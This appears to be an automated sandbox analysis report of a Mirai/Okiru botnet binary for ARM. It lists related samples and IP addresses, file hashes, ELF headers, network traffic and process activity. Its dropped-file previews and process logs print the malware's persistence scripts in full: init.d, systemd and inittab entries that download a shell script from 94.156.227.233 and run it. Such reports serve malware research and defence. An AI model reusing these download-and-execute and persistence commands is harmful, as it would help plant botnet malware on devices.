                                                  m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                      m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                        na.elfGet hashmaliciousUnknownBrowse
                                                          kj5f8keqNK.elfGet hashmaliciousUnknownBrowse
                                                            109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                                            • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                                            91.189.91.43sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                              botnet.arm7.elfGet hashmaliciousUnknownBrowse
                                                                snype.x86.elfGet hashmaliciousGafgytBrowse
                                                                  snype.ppc.elfGet hashmaliciousGafgytBrowse
                                                                    Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                                      boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                        boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                          boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                            boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                              boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                No context
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CANONICAL-ASGBsora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 91.189.91.42
                                                                                botnet.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                • 91.189.91.42
                                                                                snype.x86.elfGet hashmaliciousGafgytBrowse
                                                                                • 91.189.91.42
                                                                                snype.ppc.elfGet hashmaliciousGafgytBrowse
                                                                                • 91.189.91.42
                                                                                Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                                                • 91.189.91.42
                                                                                boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                • 91.189.91.42
                                                                                boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 91.189.91.42
                                                                                boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                • 91.189.91.42
                                                                                boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 91.189.91.42
                                                                                boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 91.189.91.42
                                                                                AMAZON-02USsora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                • 18.146.233.71
                                                                                sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                • 108.142.201.1
                                                                                sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                • 44.232.80.80
                                                                                botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                • 13.215.78.161
                                                                                botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                • 18.203.94.170
                                                                                snype.ppc.elfGet hashmaliciousGafgytBrowse
                                                                                • 54.171.230.55
                                                                                snype.arm4.elfGet hashmaliciousGafgytBrowse
                                                                                • 54.247.62.1
                                                                                boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                • 54.171.230.55
                                                                                boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                • 54.171.230.55
                                                                                mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 3.31.75.218
                                                                                SKHT-ASShenzhenKatherineHengTechnologyInformationCom68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                • 154.216.19.139
                                                                                hmips.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.254.70.159
                                                                                mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.241.11.68
                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.241.11.57
                                                                                mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.241.11.45
                                                                                ppc.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.241.11.95
                                                                                na.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.241.11.80
                                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 156.241.11.55
                                                                                file.exeGet hashmaliciousAmadey, HTMLPhisher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                • 154.216.20.237
                                                                                kisteruop.exeGet hashmaliciousStealc, VidarBrowse
                                                                                • 154.216.17.90
                                                                                INIT7CHsora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 109.202.202.202
                                                                                botnet.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                • 109.202.202.202
                                                                                snype.x86.elfGet hashmaliciousGafgytBrowse
                                                                                • 109.202.202.202
                                                                                snype.ppc.elfGet hashmaliciousGafgytBrowse
                                                                                • 109.202.202.202
                                                                                Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                                                • 109.202.202.202
                                                                                boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                • 109.202.202.202
                                                                                boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                • 109.202.202.202
                                                                                boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                • 109.202.202.202
                                                                                boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 109.202.202.202
                                                                                boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                • 109.202.202.202
                                                                                No context
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                /etc/init.d/systemarm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                  /etc/init.d/arm.nn.elfarm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    Process:/tmp/arm.nn.elf
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):119
                                                                                    Entropy (8bit):4.679703018985171
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:KPJRX7/LsDFDDoCvLdjX48FIbILbaaFOdFXa5O:WJRsZfoYZX48bbaaeXCO
                                                                                    MD5:22B40D94325900AFDC6B9EB53D194798
                                                                                    SHA1:08BE0BA4A0DBBAF03672860E49CAA446FA5A0D01
                                                                                    SHA-256:B7000D755BB22142ACD09A694C2DFD398200F3428CEE07D4C9F8C794645D75DA
                                                                                    SHA-512:D69CFF1875DAB0EA05BCB8A36098EC617C369D738BC0E0BF2F9220394E34D90B2B3A534AFC7F34E0DDFB56041B1BF3FC4247BA7B412D397598BB50578DDC5151
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:run bootcmd_mmc0; /tmp/arm.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                    Process:/bin/sh
                                                                                    File Type:POSIX shell script, ASCII text executable
                                                                                    Category:dropped
                                                                                    Size (bytes):395
                                                                                    Entropy (8bit):4.5256951458576244
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:QRkuXXNxntPUJgjvMX22FMuKN+dRRucSOyd3:qNcIyX3YOM3
                                                                                    MD5:91C4AC999529755823334A4B6DCD82A8
                                                                                    SHA1:2A19501075932DA23C70BD6BA43A153A277C106F
                                                                                    SHA-256:539CB4475ACE236662094B848B12C2AAC9325C89A5DB6742AFFE492E710BAB63
                                                                                    SHA-512:CBA55E615DE4A51F6BA23BC9946B2D9A3B145EE40D1C61D60B901D43ABBCBA421C3DB52A61D9FF090C836C8EBFDA9DB2BE711BE36E12BCFF5A4B7EA37646B8C1
                                                                                    Malicious:true
                                                                                    Joe Sandbox View:
                                                                                    • Filename: arm.nn.elf, Detection: malicious, Browse
                                                                                    Reputation:low
                                                                                    Preview:#!/bin/sh.# /etc/init.d/arm.nn.elf..case "" in. start). echo 'Starting arm.nn.elf'. /tmp/arm.nn.elf &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping arm.nn.elf'. killall arm.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                                                                    Process:/tmp/arm.nn.elf
                                                                                    File Type:POSIX shell script, ASCII text executable
                                                                                    Category:dropped
                                                                                    Size (bytes):106
                                                                                    Entropy (8bit):4.682554646441517
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:TKH4vZK7/LsDFDvSDRFiLdjX48FIbILpaKB0dFLoKE0:h8sZzSXoZX48bzBeLXE0
                                                                                    MD5:F8346921DDA8570FAF18A4B049A6F54B
                                                                                    SHA1:F360ACA003B97FC60A7010DEF8F2F8D6F2C8499E
                                                                                    SHA-256:2812F2399C64C10D897C3C95CC6690503E188BE3D8410D889944394E0BBCDDDF
                                                                                    SHA-512:C6073A0298CDF62D6B2159B41A90E2D7258ABD6B017E37CB93306E63B6A9362AE6353291658605D9AA07552FD89F70BD34083A4A58C32B16906220818FE078E8
                                                                                    Malicious:true
                                                                                    Joe Sandbox View:
                                                                                    • Filename: arm.nn.elf, Detection: malicious, Browse
                                                                                    Reputation:low
                                                                                    Preview:#!/bin/sh./tmp/arm.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                                                                    Process:/tmp/arm.nn.elf
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):111
                                                                                    Entropy (8bit):4.59789251037952
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:nAWu5d/LsDFDDoCvLdjX48FIbILbaaFOdFXa5O:AUZfoYZX48bbaaeXCO
                                                                                    MD5:55ADC91BBFC3DEAAD541897F8FA8C3AA
                                                                                    SHA1:9C13D4048F5E07583DBAC8E2E8351906C030490C
                                                                                    SHA-256:BCED71633ACE84C49EAC303BFB7C3F09435E55E79A1E154BDCB6E3148AF4AFAB
                                                                                    SHA-512:04807E43BF00C5E8BF5009FC74F763E2E4AA2DDE54BAE4687667DBC39D63B03C3ECCE6866365A5A42268B3A86E44F20497A5675EAAF65AC3B6137E6180B6E0D7
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:::respawn:/tmp/arm.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                    Process:/tmp/arm.nn.elf
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):102
                                                                                    Entropy (8bit):4.523807003925601
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Tg7/LsDFDvSDRFiLdjX48FIbILbaaFOdFXa50:TgsZzSXoZX48bbaaeXC0
                                                                                    MD5:C4A190F91F287CB5371DA6C74E0DB1B1
                                                                                    SHA1:88A0A8B84986C3669F1ACCDCD826E50EA179699F
                                                                                    SHA-256:E12E43C2746D0AC57EF00BBC885AD0B8F6D1EE57DE9419E33A2910D90C2B1F68
                                                                                    SHA-512:263F001AD19AFB93CF9337BF8A436F03C4A7EC6834CAC19B196DE794D59C61309DD4EBD66AAC0FE2715A16916483AD41AABA8A3414E10CE6DEE95D7DF0308820
                                                                                    Malicious:true
                                                                                    Preview:/tmp/arm.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                                                                    Process:/tmp/arm.nn.elf
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):300
                                                                                    Entropy (8bit):5.05186756643222
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:z8ifitRZAMzdK+Yz02+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+gp+GWRdtd+GWRXY+GWRuL6
                                                                                    MD5:1436FD8C3CCFF505882485A3B599A9C6
                                                                                    SHA1:6F528C6FE83928E73DF405594874CD8483BACE98
                                                                                    SHA-256:79FF775817DFEF4AC56DEAC28E322E0123A89498C11C6836A478925E61F6F145
                                                                                    SHA-512:07590419B290AE785D9894357A07B724B963B6E05ACFEB7C1AA2F78E80D04D5284B42D455D112F642316F9560812F5730F96A1A770AD81EC4DA35CD0898F665F
                                                                                    Malicious:false
                                                                                    Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/arm.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                                                                    Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):76
                                                                                    Entropy (8bit):3.7627880354948586
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                    MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                    SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                    SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                    SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                    Malicious:false
                                                                                    Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                    Process:/usr/libexec/gsd-housekeeping
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3::
                                                                                    MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                                    SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                                    SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                                                    SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                                    Malicious:false
                                                                                    Preview:.
                                                                                    Process:/tmp/arm.nn.elf
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):16
                                                                                    Entropy (8bit):3.5
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Tg7/LsDln:Tgs5n
                                                                                    MD5:5A9E68CC61A24B23E7CE850CBE55CD38
                                                                                    SHA1:7D53E57B760618566E5B635118604478EE1175B1
                                                                                    SHA-256:300279D18C7FC46D9F271DFDD3D803874D1B222B3512385D9FFFEED712EF1D97
                                                                                    SHA-512:09970D3B321DA48BAEB46B368CF5C40CCB90A0EB76300D7F5B03441FE9161AA5FD26C152CE83DC681397FD2FA81B6AD824092660285B1562F4D326C60517C7F3
                                                                                    Malicious:false
                                                                                    Preview:/tmp/arm.nn.elf.
                                                                                    File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                                                                    Entropy (8bit):6.2174135703574915
                                                                                    TrID:
                                                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                    File name:arm.nn.elf
                                                                                    File size:109'232 bytes
                                                                                    MD5:ac8341f87d520078a2e75c38201af17c
                                                                                    SHA1:04d1e235daf3b5fc4a74d446e071429fe5e4d666
                                                                                    SHA256:ad082aefa54bb46eb69c6df26ad692ea13c19865a0cf6714f141314ff7a14ac9
                                                                                    SHA512:6a7d29060ae01d01e6e5da65615f4bb2650d579597f05e9e039944fbcf696ac7ed86a25d483baa410912ece27015e14bb99828578ef9d0ef7a1c421cc4ac4a12
                                                                                    SSDEEP:3072:RAfmVXJj2l+oLSitNk+1yij2HY/WnnFCY4:RAfm/j2BLSitNk+1yo0Yx
                                                                                    TLSH:56B32A96B9819622C6D656BBFA6E02CC376613F8D3DB3217CD15AF20378682F0D6B540
                                                                                    File Content Preview:.ELF...a..........(.........4... .......4. ...(.........................................................4(..........Q.td..................................-...L."....\..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                                                                    ELF header

                                                                                    Class:ELF32
                                                                                    Data:2's complement, little endian
                                                                                    Version:1 (current)
                                                                                    Machine:ARM
                                                                                    Version Number:0x1
                                                                                    Type:EXEC (Executable file)
                                                                                    OS/ABI:ARM - ABI
                                                                                    ABI Version:0
                                                                                    Entry Point Address:0x8190
                                                                                    Flags:0x202
                                                                                    ELF Header Size:52
                                                                                    Program Header Offset:52
                                                                                    Program Header Size:32
                                                                                    Number of Program Headers:3
                                                                                    Section Header Offset:108832
                                                                                    Section Header Size:40
                                                                                    Number of Section Headers:10
                                                                                    Header String Table Index:9
                                                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                    NULL0x00x00x00x00x0000
                                                                                    .initPROGBITS0x80940x940x180x00x6AX004
                                                                                    .textPROGBITS0x80b00xb00x172b40x00x6AX0016
                                                                                    .finiPROGBITS0x1f3640x173640x140x00x6AX004
                                                                                    .rodataPROGBITS0x1f3780x173780x2f900x00x2A004
                                                                                    .ctorsPROGBITS0x2a30c0x1a30c0x80x00x3WA004
                                                                                    .dtorsPROGBITS0x2a3140x1a3140x80x00x3WA004
                                                                                    .dataPROGBITS0x2a3200x1a3200x5c00x00x3WA004
                                                                                    .bssNOBITS0x2a8e00x1a8e00x22600x00x3WA004
                                                                                    .shstrtabSTRTAB0x00x1a8e00x3e0x00x0001
                                                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                    LOAD0x00x80000x80000x1a3080x1a3086.22690x5R E0x8000.init .text .fini .rodata
                                                                                    LOAD0x1a30c0x2a30c0x2a30c0x5d40x28344.78790x6RW 0x8000.ctors .dtors .data .bss
                                                                                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 1, 2024 15:08:52.771776915 CET4433360654.171.230.55192.168.2.23
                                                                                    Dec 1, 2024 15:08:52.772000074 CET33606443192.168.2.2354.171.230.55
                                                                                    Dec 1, 2024 15:08:52.891978025 CET4433360654.171.230.55192.168.2.23
                                                                                    Dec 1, 2024 15:08:53.759886026 CET38966199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:53.882330894 CET19938966154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:53.882381916 CET38966199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:53.885473967 CET38966199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:53.887123108 CET38966199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:53.890019894 CET38968199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.005373001 CET19938966154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.010041952 CET19938968154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.010097980 CET38968199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.011039019 CET38968199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.011905909 CET38968199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.014669895 CET38970199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.051019907 CET19938966154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.131990910 CET19938968154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.135855913 CET19938970154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.135899067 CET38970199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.137551069 CET38970199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.138358116 CET38970199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.154313087 CET38972199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.175072908 CET19938968154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.257673979 CET19938970154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.274663925 CET19938972154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.274715900 CET38972199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.278377056 CET38972199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.280256033 CET38972199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.295903921 CET38974199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.299041986 CET19938970154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.398667097 CET19938972154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.415858030 CET19938974154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.415916920 CET38974199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.419795990 CET38974199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.423604965 CET38974199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.442979097 CET19938972154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.498584986 CET38976199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.539848089 CET19938974154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.587124109 CET19938974154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.619570971 CET19938976154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.619630098 CET38976199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.769289017 CET38976199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:54.889394999 CET19938976154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:54.889477015 CET38976199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:55.274503946 CET43928443192.168.2.2391.189.91.42
                                                                                    Dec 1, 2024 15:08:56.171648026 CET19938966154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:56.171711922 CET38966199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:56.233325958 CET19938968154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:56.233388901 CET38968199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:56.445502996 CET19938970154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:56.445554018 CET38970199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:56.538764954 CET19938972154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:56.538837910 CET38972199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:08:56.680075884 CET19938974154.216.19.139192.168.2.23
                                                                                    Dec 1, 2024 15:08:56.680160046 CET38974199192.168.2.23154.216.19.139
                                                                                    Dec 1, 2024 15:09:00.649864912 CET42836443192.168.2.2391.189.91.43
                                                                                    Dec 1, 2024 15:09:01.673680067 CET4251680192.168.2.23109.202.202.202
                                                                                    Dec 1, 2024 15:09:16.263794899 CET43928443192.168.2.2391.189.91.42
                                                                                    Dec 1, 2024 15:09:26.502334118 CET42836443192.168.2.2391.189.91.43
                                                                                    Dec 1, 2024 15:09:32.645579100 CET4251680192.168.2.23109.202.202.202
                                                                                    Dec 1, 2024 15:09:57.218260050 CET43928443192.168.2.2391.189.91.42
                                                                                    Dec 1, 2024 15:10:17.695297003 CET42836443192.168.2.2391.189.91.43

                                                                                    System Behavior

                                                                                    Start time (UTC):14:08:51
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/bin/dash
                                                                                    Arguments:-
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:08:51
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/bin/rm
                                                                                    Arguments:rm -f /tmp/tmp.WEeXQ9bqMn /tmp/tmp.iUonm93Ec6 /tmp/tmp.5umU0YmnG2
                                                                                    File size:72056 bytes
                                                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                    Start time (UTC):14:08:51
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/bin/dash
                                                                                    Arguments:-
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:08:51
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/bin/rm
                                                                                    Arguments:rm -f /tmp/tmp.WEeXQ9bqMn /tmp/tmp.iUonm93Ec6 /tmp/tmp.5umU0YmnG2
                                                                                    File size:72056 bytes
                                                                                    MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                    Start time (UTC):14:08:52
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/tmp/arm.nn.elf
                                                                                    Arguments:/tmp/arm.nn.elf
                                                                                    File size:4956856 bytes
                                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                    Start time (UTC):14:08:52
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/tmp/arm.nn.elf
                                                                                    Arguments:-
                                                                                    File size:4956856 bytes
                                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                    Start time (UTC):14:08:52
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/tmp/arm.nn.elf
                                                                                    Arguments:-
                                                                                    File size:4956856 bytes
                                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                    Start time (UTC):14:08:52
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:08:52
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:-
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:08:52
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/bin/systemctl
                                                                                    Arguments:systemctl enable custom.service
                                                                                    File size:996584 bytes
                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/tmp/arm.nn.elf
                                                                                    Arguments:-
                                                                                    File size:4956856 bytes
                                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:-
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/bin/chmod
                                                                                    Arguments:chmod +x /etc/init.d/system
                                                                                    File size:63864 bytes
                                                                                    MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/tmp/arm.nn.elf
                                                                                    Arguments:-
                                                                                    File size:4956856 bytes
                                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:-
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/usr/bin/ln
                                                                                    Arguments:ln -s /etc/init.d/system /etc/rcS.d/S99system
                                                                                    File size:76160 bytes
                                                                                    MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/tmp/arm.nn.elf
                                                                                    Arguments:-
                                                                                    File size:4956856 bytes
                                                                                    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                    Start time (UTC):14:08:53
                                                                                    Start date (UTC):01/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm.nn.elf'\n /tmp/arm.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm.nn.elf'\n killall arm.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm.nn.elf"
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):14:08:52
                                                                                    Start date (UTC):01/12/2024
